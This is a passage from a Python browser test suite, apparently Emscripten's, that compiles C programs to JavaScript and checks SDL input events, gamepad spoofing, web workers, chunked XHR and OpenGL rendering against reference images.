for defines in [[], ['-DTEST_EMSCRIPTEN_SDL_SETEVENTHANDLER']]:
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function keydown(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keydown", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
function keyup(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keyup", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
''')
open(os.path.join(self.get_dir(), 'sdl_key.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_key.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_key.c'), '-o', 'page.html'] + defines + ['--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-s', 'NO_EXIT_RUNTIME=1']).communicate()
self.run_browser('page.html', '', '/report_result?223092870')
def test_sdl_key_proxy(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var Module = {};
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
''')
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keydown", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
function keyup(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keyup", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
keydown(1250);keydown(38);keyup(38);keyup(1250); // alt, up
keydown(1248);keydown(1249);keydown(40);keyup(40);keyup(1249);keyup(1248); // ctrl, shift, down
keydown(37);keyup(37); // left
keydown(39);keyup(39); // right
keydown(65);keyup(65); // a
keydown(66);keyup(66); // b
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
open('test.html', 'w').write(html)
self.btest('sdl_key_proxy.c', '223092870', args=['--proxy-to-worker', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-s', 'NO_EXIT_RUNTIME=1'], manual_reference=True, post_build=post)
def test_sdl_text(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(charCode) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keypress", true, true, window,
0, 0, 0, 0, 0, charCode);
document.body.dispatchEvent(event);
}
''')
open(os.path.join(self.get_dir(), 'sdl_text.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_text.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
open(os.path.join(self.get_dir(), 'sdl_mouse.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_mouse.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_mouse.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js']).communicate()
self.run_browser('page.html', '', '/report_result?740')
def test_sdl_mouse_offsets(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
open(os.path.join(self.get_dir(), 'page.html'), 'w').write('''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl_mouse.js"></script>
</body>
</html>
''')
open(os.path.join(self.get_dir(), 'sdl_mouse.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_mouse.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_mouse.c'), '-O2', '--minify', '0', '-o', 'sdl_mouse.js', '--pre-js', 'pre.js']).communicate()
self.run_browser('page.html', '', '/report_result?600')
def test_glut_touchevents(self):
self.btest('glut_touchevents.c', '1')
def test_glut_wheelevents(self):
self.btest('glut_wheelevents.c', '1')
def test_sdl_joystick_1(self):
# Generates events corresponding to the Working Draft of the HTML5 Gamepad API.
# http://www.w3.org/TR/2012/WD-gamepad-20120529/#gamepad-interface
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = 0;
};
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button] = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button] = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
open(os.path.join(self.get_dir(), 'sdl_joystick.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_joystick.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_joystick.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js']).communicate()
self.run_browser('page.html', '', '/report_result?2')
def test_sdl_joystick_2(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
open(os.path.join(self.get_dir(), 'sdl_joystick.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_joystick.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_joystick.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js']).communicate()
self.run_browser('page.html', '', '/report_result?2')
def test_webgl_context_attributes(self):
# Javascript code to check the attributes support we want to test in the WebGL implementation
# (request the attribute, create a context and check its value afterwards in the context attributes).
# Tests will succeed when an attribute is not supported.
open(os.path.join(self.get_dir(), 'check_webgl_attributes_support.js'), 'w').write('''
mergeInto(LibraryManager.library, {
webglAntialiasSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {antialias: true});
attributes = context.getContextAttributes();
return attributes.antialias;
},
webglDepthSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {depth: true});
attributes = context.getContextAttributes();
return attributes.depth;
},
webglStencilSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {stencil: true});
attributes = context.getContextAttributes();
return attributes.stencil;
}
});
''')
# Copy common code file to temporary directory
filepath = path_from_root('tests/test_webgl_context_attributes_common.c')
temp_filepath = os.path.join(self.get_dir(), os.path.basename(filepath))
shutil.copyfile(filepath, temp_filepath)
# perform tests with attributes activated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED'])
# perform tests with attributes desactivated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js'])
def test_emscripten_get_now(self):
self.btest('emscripten_get_now.cpp', '1')
def test_fflush(self):
return self.skip('Skipping due to https://github.com/kripken/emscripten/issues/2770')
self.btest('test_fflush.cpp', '0', args=['-s', 'NO_EXIT_RUNTIME=1', '--shell-file', path_from_root('tests', 'test_fflush.html')])
def test_file_db(self):
secret = str(time.time())
open('moar.txt', 'w').write(secret)
self.btest('file_db.cpp', '1', args=['--preload-file', 'moar.txt', '-DFIRST'])
shutil.copyfile('test.html', 'first.html')
self.btest('file_db.cpp', secret)
shutil.copyfile('test.html', 'second.html')
open('moar.txt', 'w').write('aliantha')
self.btest('file_db.cpp', secret, args=['--preload-file', 'moar.txt']) # even with a file there, we load over it
shutil.move('test.html', 'third.html')
def test_fs_idbfs_sync(self):
for mode in [[], ['-s', 'MEMFS_APPEND_TO_TYPED_ARRAYS=1']]:
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=mode + ['-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']'''])
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=mode + ['-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']'''])
def test_force_exit(self):
self.btest('force_exit.c', force_c=True, expected='17')
def test_sdl_pumpevents(self):
# key events should be detected using SDL_PumpEvents
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function keydown(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keydown", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
''')
self.btest('sdl_pumpevents.c', expected='7', args=['--pre-js', 'pre.js'])
def test_sdl_canvas_size(self):
self.btest('sdl_canvas_size.c', expected='1',
args=['-O2', '--minify', '0', '--shell-file', path_from_root('tests', 'sdl_canvas_size.html')])
def test_sdl_gl_read(self):
# SDL, OpenGL, readPixels
open(os.path.join(self.get_dir(), 'sdl_gl_read.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_gl_read.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_gl_read.c'), '-o', 'something.html']).communicate()
self.run_browser('something.html', '.', '/report_result?1')
def test_sdl_gl_mapbuffers(self):
self.btest('sdl_gl_mapbuffers.c', expected='1', args=['-s', 'FULL_ES3=1'],
message='You should see a blue triangle.')
def test_sdl_ogl(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1'],
message='You should see an image with gray at the top.')
def test_sdl_ogl_defaultmatrixmode(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_ogl_defaultMatrixMode.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1'],
message='You should see an image with gray at the top.')
def test_sdl_ogl_p(self):
# Immediate mode with pointers
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_ogl_p.c', reference='screenshot-gray.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1'],
message='You should see an image with gray at the top.')
def test_sdl_ogl_proc_alias(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_ogl_proc_alias.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '-g2', '-s', 'INLINING_LIMIT=1', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1'])
def test_sdl_fog_simple(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1'],
message='You should see an image with fog.')
def test_sdl_fog_negative(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_negative.c', reference='screenshot-fog-negative.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1'],
message='You should see an image with fog.')
def test_sdl_fog_density(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_density.c', reference='screenshot-fog-density.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1'],
message='You should see an image with fog.')
def test_sdl_fog_exp2(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1'],
message='You should see an image with fog.')
def test_sdl_fog_linear(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1'],
message='You should see an image with fog.')
def test_glfw(self):
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION=1'])
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION=1', '-s', 'USE_GLFW=2'])
def test_egl(self):
open(os.path.join(self.get_dir(), 'test_egl.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'test_egl.c')).read()))
Popen([PYTHON, EMCC, '-O2', os.path.join(self.get_dir(), 'test_egl.c'), '-o', 'page.html']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_egl_width_height(self):
open(os.path.join(self.get_dir(), 'test_egl_width_height.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'test_egl_width_height.c')).read()))
Popen([PYTHON, EMCC, '-O2', os.path.join(self.get_dir(), 'test_egl_width_height.c'), '-o', 'page.html']).communicate()
self.run_browser('page.html', 'Should print "(300, 150)" -- the size of the canvas in pixels', '/report_result?1')
def test_worker(self):
# Test running in a web worker
open('file.dat', 'w').write('data for worker')
html_file = open('main.html', 'w')
html_file.write('''
<html>
<body>
Worker Test
<script>
var worker = new Worker('worker.js');
worker.onmessage = function(event) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:8888/report_result?' + event.data);
xhr.send();
setTimeout(function() { window.close() }, 1000);
};
</script>
</body>
</html>
''')
html_file.close()
# no file data
for file_data in [0, 1]:
print 'file data', file_data
output = Popen([PYTHON, EMCC, path_from_root('tests', 'hello_world_worker.cpp'), '-o', 'worker.js'] + (['--preload-file', 'file.dat'] if file_data else []) , stdout=PIPE, stderr=PIPE).communicate()
assert len(output[0]) == 0, output[0]
assert os.path.exists('worker.js'), output
if not file_data: self.assertContained('you should not see this text when in a worker!', run_js('worker.js')) # code should run standalone
self.run_browser('main.html', '', '/report_result?hello%20from%20worker,%20and%20|' + ('data%20for%20w' if file_data else '') + '|')
def test_chunked_synchronous_xhr(self):
main = 'chunked_sync_xhr.html'
worker_filename = "download_and_checksum_worker.js"
html_file = open(main, 'w')
html_file.write(r"""
<!doctype html>
<html>
<head><meta charset="utf-8"><title>Chunked XHR</title></head>
<html>
<body>
Chunked XHR Web Worker Test
<script>
var worker = new Worker(""" + json.dumps(worker_filename) + r""");
var buffer = [];
worker.onmessage = function(event) {
if (event.data.channel === "stdout") {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:8888/report_result?' + event.data.line);
xhr.send();
setTimeout(function() { window.close() }, 1000);
} else {
if (event.data.trace) event.data.trace.split("\n").map(function(v) { console.error(v); });
if (event.data.line) {
console.error(event.data.line);
} else {
var v = event.data.char;
if (v == 10) {
var line = buffer.splice(0);
console.error(line = line.map(function(charCode){return String.fromCharCode(charCode);}).join(''));
} else {
buffer.push(v);
}
}
}
};
</script>
</body>
</html>
""")
html_file.close()
c_source_filename = "checksummer.c"
prejs_filename = "worker_prejs.js"
prejs_file = open(prejs_filename, 'w')
prejs_file.write(r"""
if (typeof(Module) === "undefined") Module = {};
Module["arguments"] = ["/bigfile"];
Module["preInit"] = function() {
FS.createLazyFile('/', "bigfile", "http://localhost:11111/bogus_file_path", true, false);
};
var doTrace = true;
Module["print"] = function(s) { self.postMessage({channel: "stdout", line: s}); };
Module["stderr"] = function(s) { self.postMessage({channel: "stderr", char: s, trace: ((doTrace && s === 10) ? new Error().stack : null)}); doTrace = false; };
""")
prejs_file.close()
# vs. os.path.join(self.get_dir(), filename)
# vs. path_from_root('tests', 'hello_world_gles.c')
Popen([PYTHON, EMCC, path_from_root('tests', c_source_filename), '-g', '-s', 'SMALL_CHUNKS=1', '-o', worker_filename,
'--pre-js', prejs_filename]).communicate()
chunkSize = 1024
data = os.urandom(10*chunkSize+1) # 10 full chunks and one 1 byte chunk
checksum = zlib.adler32(data)
server = multiprocessing.Process(target=test_chunked_synchronous_xhr_server, args=(True,chunkSize,data,checksum,))
server.start()
self.run_browser(main, 'Chunked binary synchronous XHR in Web Workers!', '/report_result?' + str(checksum))
server.terminate()
# Avoid race condition on cleanup, wait a bit so that processes have released file locks so that test tearDown won't
# attempt to rmdir() files in use.
if WINDOWS:
time.sleep(2)
def test_glgears(self):
self.btest('hello_world_gles.c', reference='gears.png', reference_slack=2,
args=['-DHAVE_BUILTIN_SINCOS'], outfile='something.html',
message='You should see animating gears.')
def test_glgears_long(self):
for proxy in [0, 1]:
print 'proxy', proxy
self.btest('hello_world_gles.c', expected=map(str, range(30, 500)), args=['-DHAVE_BUILTIN_SINCOS', '-DLONGTEST'] + (['--proxy-to-worker'] if proxy else []))
def test_glgears_animation(self):
es2_suffix = ['', '_full', '_full_944']
for full_es2 in [0, 1, 2]:
print full_es2
Popen([PYTHON, EMCC, path_from_root('tests', 'hello_world_gles%s.c' % es2_suffix[full_es2]), '-o', 'something.html',
'-DHAVE_BUILTIN_SINCOS', '-s', 'GL_TESTING=1',
'--shell-file', path_from_root('tests', 'hello_world_gles_shell.html')] +
(['-s', 'FULL_ES2=1'] if full_es2 else []),
).communicate()
self.run_browser('something.html', 'You should see animating gears.', '/report_gl_result?true')
def test_fulles2_sdlproc(self):
self.btest('full_es2_sdlproc.c', '1', args=['-s', 'GL_TESTING=1', '-DHAVE_BUILTIN_SINCOS', '-s', 'FULL_ES2=1'])
def test_glgears_deriv(self):
self.btest('hello_world_gles_deriv.c', reference='gears.png', reference_slack=2,
args=['-DHAVE_BUILTIN_SINCOS'], outfile='something.html',
message='You should see animating gears.')
with open('something.html') as f:
assert 'gl-matrix' not in f.read(), 'Should not include glMatrix when not needed'
def test_glbook(self):
programs = self.get_library('glbook', [
os.path.join('Chapter_2', 'Hello_Triangle', 'CH02_HelloTriangle.bc'),
os.path.join('Chapter_8', 'Simple_VertexShader', 'CH08_SimpleVertexShader.bc'),
os.path.join('Chapter_9', 'Simple_Texture2D', 'CH09_SimpleTexture2D.bc'),
os.path.join('Chapter_9', 'Simple_TextureCubemap', 'CH09_TextureCubemap.bc'),
os.path.join('Chapter_9', 'TextureWrap', 'CH09_TextureWrap.bc'),
os.path.join('Chapter_10', 'MultiTexture', 'CH10_MultiTexture.bc'),
os.path.join('Chapter_13', 'ParticleSystem', 'CH13_ParticleSystem.bc'),
], configure=None)
def book_path(*pathelems):
return path_from_root('tests', 'glbook', *pathelems)
for program in programs:
print program
basename = os.path.basename(program)
args = []
if basename == 'CH10_MultiTexture.bc':
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'basemap.tga'), os.path.join(self.get_dir(), 'basemap.tga'))
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'lightmap.tga'), os.path.join(self.get_dir(), 'lightmap.tga'))
args = ['--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga']
elif basename == 'CH13_ParticleSystem.bc':
shutil.copyfile(book_path('Chapter_13', 'ParticleSystem', 'smoke.tga'), os.path.join(self.get_dir(), 'smoke.tga'))
args = ['--preload-file', 'smoke.tga', '-O2'] # test optimizations and closure here as well for more coverage
self.btest(program,
reference=book_path(basename.replace('.bc', '.png')), args=args)
def test_gles2_emulation(self):
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_10', 'MultiTexture', 'basemap.tga'), self.in_dir('basemap.tga'))
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_10', 'MultiTexture', 'lightmap.tga'), self.in_dir('lightmap.tga'))
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_13', 'ParticleSystem', 'smoke.tga'), self.in_dir('smoke.tga'))
for source, reference in [
(os.path.join('glbook', 'Chapter_2', 'Hello_Triangle', 'Hello_Triangle_orig.c'), path_from_root('tests', 'glbook', 'CH02_HelloTriangle.png')),
#(os.path.join('glbook', 'Chapter_8', 'Simple_VertexShader', 'Simple_VertexShader_orig.c'), path_from_root('tests', 'glbook', 'CH08_SimpleVertexShader.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'TextureWrap', 'TextureWrap_orig.c'), path_from_root('tests', 'glbook', 'CH09_TextureWrap.png')),
#(os.path.join('glbook', 'Chapter_9', 'Simple_TextureCubemap', 'Simple_TextureCubemap_orig.c'), path_from_root('tests', 'glbook', 'CH09_TextureCubemap.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'Simple_Texture2D', 'Simple_Texture2D_orig.c'), path_from_root('tests', 'glbook', 'CH09_SimpleTexture2D.png')),
(os.path.join('glbook', 'Chapter_10', 'MultiTexture', 'MultiTexture_orig.c'), path_from_root('tests', 'glbook', 'CH10_MultiTexture.png')),
(os.path.join('glbook', 'Chapter_13', 'ParticleSystem', 'ParticleSystem_orig.c'), path_from_root('tests', 'glbook', 'CH13_ParticleSystem.png')),
]:
print source
self.btest(source,
reference=reference,
args=['-I' + path_from_root('tests', 'glbook', 'Common'),
path_from_root('tests', 'glbook', 'Common', 'esUtil.c'),
path_from_root('tests', 'glbook', 'Common', 'esShader.c'),
path_from_root('tests', 'glbook', 'Common', 'esShapes.c'),
path_from_root('tests', 'glbook', 'Common', 'esTransform.c'),
'-s', 'FULL_ES2=1',
'--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga', '--preload-file', 'smoke.tga'])
def test_emscripten_api(self):
self.btest('emscripten_api_browser.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_third']'''])
def test_emscripten_api2(self):
def setup():
open('script1.js', 'w').write('''
Module._set(456);
''')
open('file1.txt', 'w').write('first');
open('file2.txt', 'w').write('second');
setup()
Popen([PYTHON, FILE_PACKAGER, 'test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w')).communicate()
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_set']'''])
# check using file packager to another dir
self.clear()
setup()
os.mkdir('sub')
Popen([PYTHON, FILE_PACKAGER, 'sub/test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w')).communicate()
shutil.copyfile(os.path.join('sub', 'test.data'), 'test.data')
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_set']'''])
def test_emscripten_api_infloop(self):
self.btest('emscripten_api_browser_infloop.cpp', '7')
def test_emscripten_fs_api(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png')) # preloaded *after* run
self.btest('emscripten_fs_api_browser.cpp', '1')
def test_emscripten_main_loop(self):
self.btest('emscripten_main_loop.cpp', '0')
def test_sdl_quit(self):
self.btest('sdl_quit.c', '1')
def test_sdl_resize(self):
self.btest('sdl_resize.c', '1')
def test_glshaderinfo(self):
self.btest('glshaderinfo.cpp', '1')
def test_glgetattachedshaders(self):
self.btest('glgetattachedshaders.c', '1')
def test_sdlglshader(self):
self.btest('sdlglshader.c', reference='sdlglshader.png', args=['-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION=1'])
def test_sdlglshader2(self):
self.btest('sdlglshader2.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1'], also_proxied=True)
def test_gl_glteximage(self):
self.btest('gl_teximage.c', '1')
def test_gl_textures(self):
self.btest('gl_textures.cpp', '0')
def test_gl_ps(self):
# pointers and a shader
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('gl_ps.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1'], reference_slack=1)
def test_gl_ps_packed(self):
# packed data that needs to be strided
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('gl_ps_packed.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1'], reference_slack=1)
def test_gl_ps_strides(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('gl_ps_strides.c', reference='gl_ps_strides.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1'])
def test_gl_renderers(self):
self.btest('gl_renderers.c', reference='gl_renderers.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1'])
def test_gl_stride(self):
self.btest('gl_stride.c', reference='gl_stride.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1'])
def test_gl_vertex_buffer_pre(self):
self.btest('gl_vertex_buffer_pre.c', reference='gl_vertex_buffer_pre.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1'])
def test_gl_vertex_buffer(self):
self.btest('gl_vertex_buffer.c', reference='gl_vertex_buffer.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1'], reference_slack=1)
def test_gles2_uniform_arrays(self):
